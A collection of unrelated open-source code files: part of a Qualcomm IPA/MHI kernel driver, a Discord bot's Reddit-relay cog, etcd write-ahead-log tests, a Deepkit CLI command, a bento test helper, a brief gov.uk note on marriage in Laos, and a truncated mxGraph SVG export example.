channelHandle=%d reserved=%d\n", evt.params.errorType, evt.params.channelHandle, evt.params.reserved); } else if (ipa_ctx->uc_ctx.uc_sram_mmio->eventOp == IPA_HW_2_CPU_EVENT_MHI_CHANNEL_WAKE_UP_REQUEST) { union IpaHwMhiChannelWakeupEventData_t evt; IPADBG("WakeUp channel request\n"); evt.raw32b = uc_sram_mmio->eventParams; IPADBG("channelHandle=%d reserved=%d\n", evt.params.channelHandle, evt.params.reserved); ipa_uc_mhi_ctx->wakeup_request_cb(); } } static void ipa_uc_mhi_event_log_info_hdlr( struct IpaHwEventLogInfoData_t *uc_event_top_mmio) { if ((uc_event_top_mmio->featureMask & (1 << IPA_HW_FEATURE_MHI)) == 0) { IPAERR("MHI feature missing 0x%x\n", uc_event_top_mmio->featureMask); return; } if (uc_event_top_mmio->statsInfo.featureInfo[IPA_HW_FEATURE_MHI]. params.size != sizeof(struct IpaHwStatsMhiInfoData_t)) { IPAERR("mhi stats sz invalid exp=%zu is=%u\n", sizeof(struct IpaHwStatsMhiInfoData_t), uc_event_top_mmio->statsInfo. featureInfo[IPA_HW_FEATURE_MHI].params.size); return; } ipa_uc_mhi_ctx->mhi_uc_stats_ofst = uc_event_top_mmio-> statsInfo.baseAddrOffset + uc_event_top_mmio->statsInfo. featureInfo[IPA_HW_FEATURE_MHI].params.offset; IPAERR("MHI stats ofst=0x%x\n", ipa_uc_mhi_ctx->mhi_uc_stats_ofst); if (ipa_uc_mhi_ctx->mhi_uc_stats_ofst + sizeof(struct IpaHwStatsMhiInfoData_t) >= ipa_ctx->ctrl->ipa_reg_base_ofst + IPA_SRAM_DIRECT_ACCESS_N_OFST_v2_0(0) + ipa_ctx->smem_sz) { IPAERR("uc_mhi_stats 0x%x outside SRAM\n", ipa_uc_mhi_ctx->mhi_uc_stats_ofst); return; } ipa_uc_mhi_ctx->mhi_uc_stats_mmio = ioremap(ipa_ctx->ipa_wrapper_base + ipa_uc_mhi_ctx->mhi_uc_stats_ofst, sizeof(struct IpaHwStatsMhiInfoData_t)); if (!ipa_uc_mhi_ctx->mhi_uc_stats_mmio) { IPAERR("fail to ioremap uc mhi stats\n"); return; } return; } int ipa_uc_mhi_init(void (*ready_cb)(void), void (*wakeup_request_cb)(void)) { struct ipa_uc_hdlrs hdlrs; if (ipa_uc_mhi_ctx) { IPAERR("Already initialized\n"); return -EFAULT; } ipa_uc_mhi_ctx = kzalloc(sizeof(*ipa_uc_mhi_ctx), GFP_KERNEL); if (!ipa_uc_mhi_ctx) { IPAERR("no mem\n"); return -ENOMEM; } ipa_uc_mhi_ctx->ready_cb = ready_cb; ipa_uc_mhi_ctx->wakeup_request_cb = wakeup_request_cb; memset(&hdlrs, 0, sizeof(hdlrs)); hdlrs.ipa_uc_loaded_hdlr = ipa_uc_mhi_ctx->ready_cb; hdlrs.ipa_uc_response_hdlr = ipa_uc_mhi_response_hdlr; hdlrs.ipa_uc_event_hdlr = ipa_uc_mhi_event_hdlr; hdlrs.ipa_uc_event_log_info_hdlr = ipa_uc_mhi_event_log_info_hdlr; ipa_uc_register_handlers(IPA_HW_FEATURE_MHI, &hdlrs); IPADBG("Done\n"); return 0; } int ipa_uc_mhi_init_engine(struct ipa_mhi_msi_info *msi, u32 mmio_addr, u32 host_ctrl_addr, u32 host_data_addr, u32 first_ch_idx, u32 first_evt_idx) { int res; struct ipa_mem_buffer mem; struct IpaHwMhiInitCmdData_t *init_cmd_data; struct IpaHwMhiMsiCmdData_t *msi_cmd; if (!ipa_uc_mhi_ctx) { IPAERR("Not initialized\n"); return -EFAULT; } ipa_inc_client_enable_clks(); res = ipa_uc_update_hw_flags(0); if (res) { IPAERR("ipa_uc_update_hw_flags failed %d\n", res); goto disable_clks; } mem.size = sizeof(*init_cmd_data); mem.base = dma_alloc_coherent(ipa_ctx->pdev, mem.size, &mem.phys_base, GFP_KERNEL); if (!mem.base) { IPAERR("fail to alloc DMA buff of size %d\n", mem.size); res = -ENOMEM; goto disable_clks; } memset(mem.base, 0, mem.size); init_cmd_data = (struct IpaHwMhiInitCmdData_t *)mem.base; init_cmd_data->msiAddress = msi->addr_low; init_cmd_data->mmioBaseAddress = mmio_addr; init_cmd_data->deviceMhiCtrlBaseAddress = host_ctrl_addr; init_cmd_data->deviceMhiDataBaseAddress = host_data_addr; init_cmd_data->firstChannelIndex = first_ch_idx; init_cmd_data->firstEventRingIndex = first_evt_idx; res = ipa_uc_send_cmd((u32)mem.phys_base, IPA_CPU_2_HW_CMD_MHI_INIT, 0, false, HZ); if (res) { IPAERR("ipa_uc_send_cmd failed %d\n", res); dma_free_coherent(ipa_ctx->pdev, mem.size, mem.base, mem.phys_base); goto disable_clks; } dma_free_coherent(ipa_ctx->pdev, mem.size, mem.base, mem.phys_base); mem.size = sizeof(*msi_cmd); mem.base = dma_alloc_coherent(ipa_ctx->pdev, mem.size, &mem.phys_base, GFP_KERNEL); if (!mem.base) { IPAERR("fail to alloc DMA buff of size %d\n", mem.size); res = -ENOMEM; goto disable_clks; } msi_cmd = (struct IpaHwMhiMsiCmdData_t *)mem.base; msi_cmd->msiAddress_hi = msi->addr_hi; msi_cmd->msiAddress_low = msi->addr_low; msi_cmd->msiData = msi->data; msi_cmd->msiMask = msi->mask; res = ipa_uc_send_cmd((u32)mem.phys_base, IPA_CPU_2_HW_CMD_MHI_UPDATE_MSI, 0, false, HZ); if (res) { IPAERR("ipa_uc_send_cmd failed %d\n", res); dma_free_coherent(ipa_ctx->pdev, mem.size, mem.base, mem.phys_base); goto disable_clks; } dma_free_coherent(ipa_ctx->pdev, mem.size, mem.base, mem.phys_base); res = 0; disable_clks: ipa_dec_client_disable_clks(); return res; } int ipa_uc_mhi_init_channel(int ipa_ep_idx, int channelHandle, int contexArrayIndex, int channelDirection) { int res; union IpaHwMhiInitChannelCmdData_t init_cmd; union IpaHwMhiChangeChannelStateResponseData_t uc_rsp; if (!ipa_uc_mhi_ctx) { IPAERR("Not initialized\n"); return -EFAULT; } if (ipa_ep_idx < 0 || ipa_ep_idx >= IPA_NUM_PIPES) { IPAERR("Invalid ipa_ep_idx.\n"); return -EINVAL; } ipa_inc_client_enable_clks(); memset(&uc_rsp, 0, sizeof(uc_rsp)); uc_rsp.params.state = IPA_HW_MHI_CHANNEL_STATE_RUN; uc_rsp.params.channelHandle = channelHandle; ipa_uc_mhi_ctx->expected_responseOp = IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE; ipa_uc_mhi_ctx->expected_responseParams = uc_rsp.raw32b; memset(&init_cmd, 0, sizeof(init_cmd)); init_cmd.params.channelHandle = channelHandle; init_cmd.params.contexArrayIndex = contexArrayIndex; init_cmd.params.bamPipeId = ipa_ep_idx; init_cmd.params.channelDirection = channelDirection; res = ipa_uc_send_cmd(init_cmd.raw32b, IPA_CPU_2_HW_CMD_MHI_INIT_CHANNEL, 0, false, HZ); if (res) { IPAERR("ipa_uc_send_cmd failed %d\n", res); goto disable_clks; } res = 0; disable_clks: ipa_dec_client_disable_clks(); return res; } int ipa_uc_mhi_reset_channel(int channelHandle) { union IpaHwMhiChangeChannelStateCmdData_t cmd; union IpaHwMhiChangeChannelStateResponseData_t uc_rsp; int res; if (!ipa_uc_mhi_ctx) { IPAERR("Not initialized\n"); return -EFAULT; } ipa_inc_client_enable_clks(); memset(&uc_rsp, 0, sizeof(uc_rsp)); uc_rsp.params.state = IPA_HW_MHI_CHANNEL_STATE_DISABLE; uc_rsp.params.channelHandle = channelHandle; ipa_uc_mhi_ctx->expected_responseOp = IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE; ipa_uc_mhi_ctx->expected_responseParams = uc_rsp.raw32b; memset(&cmd, 0, sizeof(cmd)); cmd.params.requestedState = IPA_HW_MHI_CHANNEL_STATE_DISABLE; cmd.params.channelHandle = channelHandle; res = ipa_uc_send_cmd(cmd.raw32b, IPA_CPU_2_HW_CMD_MHI_CHANGE_CHANNEL_STATE, 0, false, HZ); if (res) { IPAERR("ipa_uc_send_cmd failed %d\n", res); goto disable_clks; } res = 0; disable_clks: ipa_dec_client_disable_clks(); return res; } int ipa_uc_mhi_suspend_channel(int channelHandle) { union IpaHwMhiChangeChannelStateCmdData_t cmd; union IpaHwMhiChangeChannelStateResponseData_t uc_rsp; int res; if (!ipa_uc_mhi_ctx) { IPAERR("Not initialized\n"); return -EFAULT; } ipa_inc_client_enable_clks(); memset(&uc_rsp, 0, sizeof(uc_rsp)); uc_rsp.params.state = IPA_HW_MHI_CHANNEL_STATE_SUSPEND; uc_rsp.params.channelHandle = channelHandle; ipa_uc_mhi_ctx->expected_responseOp = IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE; ipa_uc_mhi_ctx->expected_responseParams = uc_rsp.raw32b; memset(&cmd, 0, sizeof(cmd)); cmd.params.requestedState = IPA_HW_MHI_CHANNEL_STATE_SUSPEND; cmd.params.channelHandle = channelHandle; res = ipa_uc_send_cmd(cmd.raw32b, IPA_CPU_2_HW_CMD_MHI_CHANGE_CHANNEL_STATE, 0, false, HZ); if (res) { IPAERR("ipa_uc_send_cmd failed %d\n", res); goto disable_clks; } res = 0; disable_clks: ipa_dec_client_disable_clks(); return res; } int ipa_uc_mhi_resume_channel(int channelHandle, bool LPTransitionRejected) { union IpaHwMhiChangeChannelStateCmdData_t cmd; union IpaHwMhiChangeChannelStateResponseData_t uc_rsp; int res; if (!ipa_uc_mhi_ctx) { IPAERR("Not initialized\n"); return -EFAULT; } ipa_inc_client_enable_clks(); memset(&uc_rsp, 0, sizeof(uc_rsp)); uc_rsp.params.state = IPA_HW_MHI_CHANNEL_STATE_RUN; uc_rsp.params.channelHandle = channelHandle; ipa_uc_mhi_ctx->expected_responseOp = IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE; ipa_uc_mhi_ctx->expected_responseParams = uc_rsp.raw32b; memset(&cmd, 0, sizeof(cmd)); cmd.params.requestedState = IPA_HW_MHI_CHANNEL_STATE_RUN; cmd.params.channelHandle = channelHandle; cmd.params.LPTransitionRejected = LPTransitionRejected; res = ipa_uc_send_cmd(cmd.raw32b, IPA_CPU_2_HW_CMD_MHI_CHANGE_CHANNEL_STATE, 0, false, HZ); if (res) { IPAERR("ipa_uc_send_cmd failed %d\n", res); goto disable_clks; } res = 0; disable_clks: ipa_dec_client_disable_clks(); return res; } int ipa_uc_mhi_stop_event_update_channel(int channelHandle) { union IpaHwMhiStopEventUpdateData_t cmd; int res; if (!ipa_uc_mhi_ctx) { IPAERR("Not initialized\n"); return -EFAULT; } ipa_inc_client_enable_clks(); memset(&cmd, 0, sizeof(cmd)); cmd.params.channelHandle = channelHandle; ipa_uc_mhi_ctx->expected_responseOp = IPA_CPU_2_HW_CMD_MHI_STOP_EVENT_UPDATE; ipa_uc_mhi_ctx->expected_responseParams = cmd.raw32b; res = ipa_uc_send_cmd(cmd.raw32b, IPA_CPU_2_HW_CMD_MHI_STOP_EVENT_UPDATE, 0, false, HZ); if (res) { IPAERR("ipa_uc_send_cmd failed %d\n", res); goto disable_clks; } res = 0; disable_clks: ipa_dec_client_disable_clks(); return res; } int ipa_uc_mhi_send_dl_ul_sync_info(union IpaHwMhiDlUlSyncCmdData_t cmd) { int res; if (!ipa_uc_mhi_ctx) { IPAERR("Not initialized\n"); return -EFAULT; } IPADBG("isDlUlSyncEnabled=0x%x UlAccmVal=0x%x\n", cmd.params.isDlUlSyncEnabled, cmd.params.UlAccmVal); IPADBG("ulMsiEventThreshold=0x%x dlMsiEventThreshold=0x%x\n", cmd.params.ulMsiEventThreshold, cmd.params.dlMsiEventThreshold); ipa_inc_client_enable_clks(); res = ipa_uc_send_cmd(cmd.raw32b, IPA_CPU_2_HW_CMD_MHI_DL_UL_SYNC_INFO, 0, false, HZ); if (res) { IPAERR("ipa_uc_send_cmd failed %d\n", res); goto disable_clks; } res = 0; disable_clks: ipa_dec_client_disable_clks(); return res; } int ipa_uc_mhi_print_stats(char *dbg_buff, int size) { int nBytes = 0; int i; if (!ipa_uc_mhi_ctx->mhi_uc_stats_mmio) { IPAERR("MHI uc stats is not valid\n"); return 0; } nBytes += scnprintf(&dbg_buff[nBytes], size - nBytes, "Common Stats:\n"); PRINT_COMMON_STATS(numULDLSync); PRINT_COMMON_STATS(numULTimerExpired); PRINT_COMMON_STATS(numChEvCtxWpRead); for (i = 0; i < IPA_HW_MAX_NUMBER_OF_CHANNELS; i++) { nBytes += scnprintf(&dbg_buff[nBytes], size - nBytes, "Channel %d Stats:\n", i); PRINT_CHANNEL_STATS(i, doorbellInt); PRINT_CHANNEL_STATS(i, reProccesed); PRINT_CHANNEL_STATS(i, bamFifoFull); PRINT_CHANNEL_STATS(i, bamFifoEmpty); PRINT_CHANNEL_STATS(i, bamFifoUsageHigh); PRINT_CHANNEL_STATS(i, bamFifoUsageLow); PRINT_CHANNEL_STATS(i, bamInt); PRINT_CHANNEL_STATS(i, ringFull); PRINT_CHANNEL_STATS(i, ringEmpty); PRINT_CHANNEL_STATS(i, ringUsageHigh); PRINT_CHANNEL_STATS(i, ringUsageLow); PRINT_CHANNEL_STATS(i, delayedMsi); PRINT_CHANNEL_STATS(i, immediateMsi); PRINT_CHANNEL_STATS(i, thresholdMsi); PRINT_CHANNEL_STATS(i, numSuspend); PRINT_CHANNEL_STATS(i, numResume); PRINT_CHANNEL_STATS(i, num_OOB); PRINT_CHANNEL_STATS(i, num_OOB_timer_expiry); PRINT_CHANNEL_STATS(i, num_OOB_moderation_timer_start); PRINT_CHANNEL_STATS(i, num_db_mode_evt); } return nBytes; }
{ "pile_set_name": "Github" }
import os import bento.testing.bentos from bento.core.package \ import \ PackageDescription from bento.installed_package_description \ import \ InstalledSection, build_manifest_meta_from_pkg # FIXME: use correct install path instead of python package hack BENTOS_DIR = os.path.dirname(bento.testing.bentos.__file__) SPHINX_META = os.path.join(BENTOS_DIR, "sphinx_meta.info") SPHINX_META_PKG = PackageDescription.from_file(SPHINX_META) def create_simple_build_manifest_args(top_node): files = ["scripts/foo.py", "scripts/bar.py"] srcdir = "source" nodes = [top_node.make_node(os.path.join(srcdir, f)) for f in files] for n in nodes: n.parent.mkdir() n.write("") section = InstalledSection.from_source_target_directories("pythonfiles", "section1", os.path.join("$_srcrootdir", srcdir), "$prefix/target", files) sections = {"pythonfiles": {"section1": section}} meta = build_manifest_meta_from_pkg(SPHINX_META_PKG) return meta, sections, nodes
{ "pile_set_name": "Github" }
import asyncio import logging import random import textwrap from collections import namedtuple from datetime import datetime, timedelta from typing import List from aiohttp import BasicAuth, ClientError from discord import Colour, Embed, TextChannel from discord.ext.commands import Cog, Context, group, has_any_role from discord.ext.tasks import loop from discord.utils import escape_markdown from bot.bot import Bot from bot.constants import Channels, ERROR_REPLIES, Emojis, Reddit as RedditConfig, STAFF_ROLES, Webhooks from bot.converters import Subreddit from bot.pagination import LinePaginator from bot.utils.messages import sub_clyde log = logging.getLogger(__name__) AccessToken = namedtuple("AccessToken", ["token", "expires_at"]) class Reddit(Cog): """Track subreddit posts and show detailed statistics about them.""" HEADERS = {"User-Agent": "python3:python-discord/bot:1.0.0 (by /u/PythonDiscord)"} URL = "https://www.reddit.com" OAUTH_URL = "https://oauth.reddit.com" MAX_RETRIES = 3 def __init__(self, bot: Bot): self.bot = bot self.webhook = None self.access_token = None self.client_auth = BasicAuth(RedditConfig.client_id, RedditConfig.secret) bot.loop.create_task(self.init_reddit_ready()) self.auto_poster_loop.start() def cog_unload(self) -> None: """Stop the loop task and revoke the access token when the cog is unloaded.""" self.auto_poster_loop.cancel() if self.access_token and self.access_token.expires_at > datetime.utcnow(): asyncio.create_task(self.revoke_access_token()) async def init_reddit_ready(self) -> None: """Sets the reddit webhook when the cog is loaded.""" await self.bot.wait_until_guild_available() if not self.webhook: self.webhook = await self.bot.fetch_webhook(Webhooks.reddit) @property def channel(self) -> TextChannel: """Get the #reddit channel object from the bot's cache.""" return self.bot.get_channel(Channels.reddit) async def get_access_token(self) -> None: """ Get a Reddit API OAuth2 access token and assign it to self.access_token. A token is valid for 1 hour. There will be MAX_RETRIES to get a token, after which the cog will be unloaded and a ClientError raised if retrieval was still unsuccessful. """ for i in range(1, self.MAX_RETRIES + 1): response = await self.bot.http_session.post( url=f"{self.URL}/api/v1/access_token", headers=self.HEADERS, auth=self.client_auth, data={ "grant_type": "client_credentials", "duration": "temporary" } ) if response.status == 200 and response.content_type == "application/json": content = await response.json() expiration = int(content["expires_in"]) - 60 # Subtract 1 minute for leeway. self.access_token = AccessToken( token=content["access_token"], expires_at=datetime.utcnow() + timedelta(seconds=expiration) ) log.debug(f"New token acquired; expires on UTC {self.access_token.expires_at}") return else: log.debug( f"Failed to get an access token: " f"status {response.status} & content type {response.content_type}; " f"retrying ({i}/{self.MAX_RETRIES})" ) await asyncio.sleep(3) self.bot.remove_cog(self.qualified_name) raise ClientError("Authentication with the Reddit API failed. Unloading the cog.") async def revoke_access_token(self) -> None: """ Revoke the OAuth2 access token for the Reddit API. For security reasons, it's good practice to revoke the token when it's no longer being used. """ response = await self.bot.http_session.post( url=f"{self.URL}/api/v1/revoke_token", headers=self.HEADERS, auth=self.client_auth, data={ "token": self.access_token.token, "token_type_hint": "access_token" } ) if response.status == 204 and response.content_type == "application/json": self.access_token = None else: log.warning(f"Unable to revoke access token: status {response.status}.") async def fetch_posts(self, route: str, *, amount: int = 25, params: dict = None) -> List[dict]: """A helper method to fetch a certain amount of Reddit posts at a given route.""" # Reddit's JSON responses only provide 25 posts at most. if not 25 >= amount > 0: raise ValueError("Invalid amount of subreddit posts requested.") # Renew the token if necessary. if not self.access_token or self.access_token.expires_at < datetime.utcnow(): await self.get_access_token() url = f"{self.OAUTH_URL}/{route}" for _ in range(self.MAX_RETRIES): response = await self.bot.http_session.get( url=url, headers={**self.HEADERS, "Authorization": f"bearer {self.access_token.token}"}, params=params ) if response.status == 200 and response.content_type == 'application/json': # Got appropriate response - process and return. content = await response.json() posts = content["data"]["children"] return posts[:amount] await asyncio.sleep(3) log.debug(f"Invalid response from: {url} - status code {response.status}, mimetype {response.content_type}") return list() # Failed to get appropriate response within allowed number of retries. async def get_top_posts(self, subreddit: Subreddit, time: str = "all", amount: int = 5) -> Embed: """ Get the top amount of posts for a given subreddit within a specified timeframe. A time of "all" will get posts from all time, "day" will get top daily posts and "week" will get the top weekly posts. The amount should be between 0 and 25 as Reddit's JSON requests only provide 25 posts at most. """ embed = Embed(description="") posts = await self.fetch_posts( route=f"{subreddit}/top", amount=amount, params={"t": time} ) if not posts: embed.title = random.choice(ERROR_REPLIES) embed.colour = Colour.red() embed.description = ( "Sorry! We couldn't find any posts from that subreddit. " "If this problem persists, please let us know." ) return embed for post in posts: data = post["data"] text = data["selftext"] if text: text = textwrap.shorten(text, width=128, placeholder="...") text += "\n" # Add newline to separate embed info ups = data["ups"] comments = data["num_comments"] author = data["author"] title = textwrap.shorten(data["title"], width=64, placeholder="...") # Normal brackets interfere with Markdown. title = escape_markdown(title).replace("[", "⦋").replace("]", "⦌") link = self.URL + data["permalink"] embed.description += ( f"**[{title}]({link})**\n" f"{text}" f"{Emojis.upvotes} {ups} {Emojis.comments} {comments} {Emojis.user} {author}\n\n" ) embed.colour = Colour.blurple() return embed @loop() async def auto_poster_loop(self) -> None: """Post the top 5 posts daily, and the top 5 posts weekly.""" # once we upgrade to d.py 1.3 this can be removed and the loop can use the `time=datetime.time.min` parameter now = datetime.utcnow() tomorrow = now + timedelta(days=1) midnight_tomorrow = tomorrow.replace(hour=0, minute=0, second=0) seconds_until = (midnight_tomorrow - now).total_seconds() await asyncio.sleep(seconds_until) await self.bot.wait_until_guild_available() if not self.webhook: await self.bot.fetch_webhook(Webhooks.reddit) if datetime.utcnow().weekday() == 0: await self.top_weekly_posts() # if it's a monday send the top weekly posts for subreddit in RedditConfig.subreddits: top_posts = await self.get_top_posts(subreddit=subreddit, time="day") username = sub_clyde(f"{subreddit} Top Daily Posts") message = await self.webhook.send(username=username, embed=top_posts, wait=True) if message.channel.is_news(): await message.publish() async def top_weekly_posts(self) -> None: """Post a summary of the top posts.""" for subreddit in RedditConfig.subreddits: # Send and pin the new weekly posts. top_posts = await self.get_top_posts(subreddit=subreddit, time="week") username = sub_clyde(f"{subreddit} Top Weekly Posts") message = await self.webhook.send(wait=True, username=username, embed=top_posts) if subreddit.lower() == "r/python": if not self.channel: log.warning("Failed to get #reddit channel to remove pins in the weekly loop.") return # Remove the oldest pins so that only 12 remain at most. pins = await self.channel.pins() while len(pins) >= 12: await pins[-1].unpin() del pins[-1] await message.pin() if message.channel.is_news(): await message.publish() @group(name="reddit", invoke_without_command=True) async def reddit_group(self, ctx: Context) -> None: """View the top posts from various subreddits.""" await ctx.send_help(ctx.command) @reddit_group.command(name="top") async def top_command(self, ctx: Context, subreddit: Subreddit = "r/Python") -> None: """Send the top posts of all time from a given subreddit.""" async with ctx.typing(): embed = await self.get_top_posts(subreddit=subreddit, time="all") await ctx.send(content=f"Here are the top {subreddit} posts of all time!", embed=embed) @reddit_group.command(name="daily") async def daily_command(self, ctx: Context, subreddit: Subreddit = "r/Python") -> None: """Send the top posts of today from a given subreddit.""" async with ctx.typing(): embed = await self.get_top_posts(subreddit=subreddit, time="day") await ctx.send(content=f"Here are today's top {subreddit} posts!", embed=embed) @reddit_group.command(name="weekly") async def weekly_command(self, ctx: Context, subreddit: Subreddit = "r/Python") -> None: """Send the top posts of this week from a given subreddit.""" async with ctx.typing(): embed = await self.get_top_posts(subreddit=subreddit, time="week") await ctx.send(content=f"Here are this week's top {subreddit} posts!", embed=embed) @has_any_role(*STAFF_ROLES) @reddit_group.command(name="subreddits", aliases=("subs",)) async def subreddits_command(self, ctx: Context) -> None: """Send a paginated embed of all the subreddits we're relaying.""" embed = Embed() embed.title = "Relayed subreddits." embed.colour = Colour.blurple() await LinePaginator.paginate( RedditConfig.subreddits, ctx, embed, footer_text="Use the reddit commands along with these to view their posts.", empty=False, max_lines=15 ) def setup(bot: Bot) -> None: """Load the Reddit cog.""" if not RedditConfig.secret or not RedditConfig.client_id: log.error("Credentials not provided, cog not loaded.") return bot.add_cog(Reddit(bot))
{ "pile_set_name": "Github" }
It’s not possible for 2 foreigners to get married in Laos. One of you must be a Lao national. Contact the [Embassy of Laos](/government/publications/foreign-embassies-in-the-uk) to find out about local marriage laws.
{ "pile_set_name": "Github" }
/* * Copyright (c) Marc J. Schmidt <[email protected]> * This file is part of Deepkit and licensed under GNU GPL v3. See the LICENSE file for more information. */ import {Command} from '@oclif/command'; import 'reflect-metadata'; import {getCWD, getFolderLinksOfDirectory, getHomeConfig} from "@deepkit/core-node"; import {AppControllerInterface, createUserSocketClient} from "@deepkit/core"; import chalk from "chalk"; export class IdCommand extends Command { static description = 'Shows information about configured accounts, authentication, and linked projects.'; public static flags = {}; public async run(): Promise<void> { const {args, flags} = this.parse(IdCommand); const home = await getHomeConfig(); for (const account of home.accounts) { const client = await createUserSocketClient(account); const app = client.controller<AppControllerInterface>('app'); try { const user = await app.getAuthenticatedUser(); console.log(`Account ${chalk.green(account.name)} ${chalk.gray(account.host)}: authenticated as ${chalk.yellow(user.value.username)} <${user.value.email}>`); const orgas = await app.getMyOrganisations(); for (const org of orgas.all()) { console.log(` Member of organisation ${chalk.yellow(org.username)}.`); } } catch (error) { console.error(`Account ${chalk.red(account.name)} ${chalk.gray(account.host)} not reachable: ${chalk.yellow(error.message)}`); } finally { client.disconnect(); } } console.log(`Linked projects:`); const links = await getFolderLinksOfDirectory(getCWD()); if (links.length) { for (const link of links) { const account = home.getAccount(link.accountId); console.log(` Project ${chalk.green(link.name)} via account ${chalk.green(account.name)} in folder ${chalk.yellow(link.path)}`); } } else { console.log(` No links for ${getCWD()}`); } process.exit(0); } }
{ "pile_set_name": "Github" }
// Copyright 2015 The etcd Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package wal import ( "bytes" "hash/crc32" "io" "io/ioutil" "reflect" "testing" "github.com/coreos/etcd/wal/walpb" ) var ( infoData = []byte("\b\xef\xfd\x02") infoRecord = append([]byte("\x0e\x00\x00\x00\x00\x00\x00\x00\b\x01\x10\x99\xb5\xe4\xd0\x03\x1a\x04"), infoData...) ) func TestReadRecord(t *testing.T) { badInfoRecord := make([]byte, len(infoRecord)) copy(badInfoRecord, infoRecord) badInfoRecord[len(badInfoRecord)-1] = 'a' tests := []struct { data []byte wr *walpb.Record we error }{ {infoRecord, &walpb.Record{Type: 1, Crc: crc32.Checksum(infoData, crcTable), Data: infoData}, nil}, {[]byte(""), &walpb.Record{}, io.EOF}, {infoRecord[:8], &walpb.Record{}, io.ErrUnexpectedEOF}, {infoRecord[:len(infoRecord)-len(infoData)-8], &walpb.Record{}, io.ErrUnexpectedEOF}, {infoRecord[:len(infoRecord)-len(infoData)], &walpb.Record{}, io.ErrUnexpectedEOF}, {infoRecord[:len(infoRecord)-8], &walpb.Record{}, io.ErrUnexpectedEOF}, {badInfoRecord, &walpb.Record{}, walpb.ErrCRCMismatch}, } rec := &walpb.Record{} for i, tt := range tests { buf := bytes.NewBuffer(tt.data) decoder := newDecoder(ioutil.NopCloser(buf)) e := decoder.decode(rec) if !reflect.DeepEqual(rec, tt.wr) { t.Errorf("#%d: block = %v, want %v", i, rec, tt.wr) } if !reflect.DeepEqual(e, tt.we) { t.Errorf("#%d: err = %v, want %v", i, e, tt.we) } rec = &walpb.Record{} } } func TestWriteRecord(t *testing.T) { b := &walpb.Record{} typ := int64(0xABCD) d := []byte("Hello world!") buf := new(bytes.Buffer) e := newEncoder(buf, 0, 0) e.encode(&walpb.Record{Type: typ, Data: d}) e.flush() decoder := newDecoder(ioutil.NopCloser(buf)) err := decoder.decode(b) if err != nil { t.Errorf("err = %v, want nil", err) } if b.Type != typ { t.Errorf("type = %d, want %d", b.Type, typ) } if !reflect.DeepEqual(b.Data, d) { t.Errorf("data = %v, want %v", b.Data, d) } }
{ "pile_set_name": "Github" }
<!-- $Id: Export.htm,v 1.1 2014/01/03 12:30:29 gaudenz Exp $ Copyright (c) 2006-2013, JGraph Ltd --> <html> <head> <title>Export example for mxGraph</title> <!-- Sets the basepath for the library if not in same directory --> <script type="text/javascript"> mxBasePath = '/mxgraph/javascript/src'; </script> <!-- Loads and initializes the library --> <script type="text/javascript" src="/mxgraph/javascript/src/js/mxClient.js"></script> <!-- Example code --> <script type="text/javascript"> // Program starts here. Creates a sample graph in the // DOM node with the specified ID. This function is invoked // from the onLoad event handler of the document (see below). function main(container) { // Checks if the browser is supported if (!mxClient.isBrowserSupported()) { // Displays an error message if the browser is not supported. mxUtils.error('Browser is not supported!', 200, false); } else { // Disables the built-in context menu mxEvent.disableContextMenu(container); // Creates the graph inside the given container var graph = new mxGraph(container); // Enables rubberband selection new mxRubberband(graph); // Gets the default parent for inserting new cells. This // is normally the first child of the root (ie. layer 0). var parent = graph.getDefaultParent(); // Adds cells to the model in a single step graph.getModel().beginUpdate(); try { var v1 = graph.insertVertex(parent, null, 'Hello,', 20, 20, 80, 30); var v2 = graph.insertVertex(parent, null, 'World!', 200, 150, 80, 30); var e1 = graph.insertEdge(parent, null, '', v1, v2); } finally { // Updates the display graph.getModel().endUpdate(); } // Exporting to SVG using EchoServlet document.body.appendChild(mxUtils.button('Export SVG', function () { var background = '#ffffff'; var scale = 1; var border = 1; var imgExport = new mxImageExport(); var bounds = graph.getGraphBounds(); var vs = graph.view.scale; // Prepares SVG document that holds the output var svgDoc = mxUtils.createXmlDocument(); var root = (svgDoc.createElementNS != null) ? svgDoc.createElementNS(mxConstants.NS_SVG, 'svg') : svgDoc.createElement('svg'); if (background != null) { if (root.style != null) { root.style.backgroundColor = background; } else { root.setAttribute('style', 'background-color:' + background); } } if (svgDoc.createElementNS == null) { root.setAttribute('xmlns', mxConstants.NS_SVG); } else { // KNOWN: Ignored in IE9-11, adds namespace for each image element instead. No workaround. root.setAttributeNS('http://www.w3.org/2000/xmlns/', 'xmlns:xlink', mxConstants.NS_XLINK); } root.setAttribute('width', (Math.ceil(bounds.width * scale / vs) + 2 * border) + 'px'); root.setAttribute('height', (Math.ceil(bounds.height * scale / vs) + 2 * border) + 'px'); root.setAttribute('version', '1.1'); // Adds group for anti-aliasing via transform var group = (svgDoc.createElementNS != null) ? svgDoc.createElementNS(mxConstants.NS_SVG, 'g') : svgDoc.createElement('g'); group.setAttribute('transform', 'translate(0.5,0.5)'); root.appendChild(group); svgDoc.appendChild(root); // Renders graph. Offset will be multiplied with state's scale when painting state. var svgCanvas = new mxSvgCanvas2D(group); svgCanvas.translate(Math.floor((border / scale - bounds.x) / vs), Math.floor((border / scale - bounds.y) / vs)); svgCanvas.scale(scale / vs); imgExport.drawState(graph.getView().getState(graph.model.root), svgCanvas); var xml = encodeURIComponent(mxUtils.getXml(root)); new mxXmlRequest('/Echo.ashx', 'filename=export.svg&format=svg' + '&xml=' + xml).simulate(document, '_blank'); })); function exportFile(format) { var bg = '#ffffff'; var scale = 1; var b = 1; var imgExport = new mxImageExport(); var bounds = graph.getGraphBounds(); var vs = graph.view.scale; // New image export var xmlDoc = mxUtils.createXmlDocument(); var root = xmlDoc.createElement('output'); xmlDoc.appendChild(root); // Renders graph. Offset will be multiplied with state's scale when painting state. var xmlCanvas = new mxXmlCanvas2D(root); xmlCanvas.translate(Math.floor((b / scale - bounds.x) / vs), Math.floor((b / scale - bounds.y) / vs)); xmlCanvas.scale(scale / 